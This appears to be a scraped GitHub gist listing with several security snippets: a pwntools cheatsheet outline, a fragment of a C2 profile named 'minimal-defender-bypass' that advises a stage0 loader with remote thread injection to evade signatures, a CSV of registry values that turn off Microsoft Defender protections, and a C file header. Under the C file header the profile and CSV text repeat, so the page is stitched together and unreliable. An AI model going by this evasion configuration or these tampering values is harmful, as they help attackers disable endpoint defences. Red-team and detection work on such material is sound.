RistBS

## pwntools-cheatsheet.md

      
              1 file
            
          
              53 forks
            
          
              0 comments
            
          
              267 stars
            
          
                anvbis
                / pwntools-cheatsheet.md
            
            
              Last active
              July 15, 2024 06:52
            
              
                pwntools-cheatsheet.md
              
          
    Pwntools Cheatsheet


Program Interaction
Environment and Contexts
Logging and Output
Encoding, Packing and Utility
Assembly and Shellcraft
ELFs, Strings and Symbols
Return Oriented Programming
SROP and Sigreturn Frames


## minimal-defender-bypass.profile
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works

set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";

stage {
  set allocator "MapViewOfFile";
  set name "notevil.dll";

## KerberosCorrelation.ipynb

      
              3 files
            
          
              5 forks
            
          
              1 comment
            
          
              14 stars
            
          
                jsecurity101
                / KerberosCorrelation.ipynb
            
            
              Last active
              May 28, 2024 22:40
            
              
                Kerberos Detection/Investigation
              
          
        Loading

      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## evasion_reg_values
"Top 10000 values of registry.value","Count of records"
TamperProtection,"1,400"
DisableAntiSpyware,"1,388"
DisableBehaviorMonitoring,"1,381"
DisableIOAVProtection,"1,368"
DisableOnAccessProtection,"1,359"
DisableRealtimeMonitoring,"1,344"
DisableScanOnRealtimeEnable,"1,323"
DisableNotifications,"1,312"
AUOptions,"1,280"

## CtlInject_Legacy.c
/*!
 *
 * ROGUE
 *
 * GuidePoint Security LLC
 *
 * Threat and Attack Simulation Team
 *
!*/
	# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
	# as stage0, remote injecting a thread into a suspended process works

	set host_stage "false";
	set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
	set sleeptime "10000";

	stage {
	set allocator "MapViewOfFile";
	set name "notevil.dll";
	"Top 10000 values of registry.value","Count of records"
	TamperProtection,"1,400"
	DisableAntiSpyware,"1,388"
	DisableBehaviorMonitoring,"1,381"
	DisableIOAVProtection,"1,368"
	DisableOnAccessProtection,"1,359"
	DisableRealtimeMonitoring,"1,344"
	DisableScanOnRealtimeEnable,"1,323"
	DisableNotifications,"1,312"
	AUOptions,"1,280"
	/*!
	*
	* ROGUE
	*
	* GuidePoint Security LLC
	*
	* Threat and Attack Simulation Team
	*
	!*/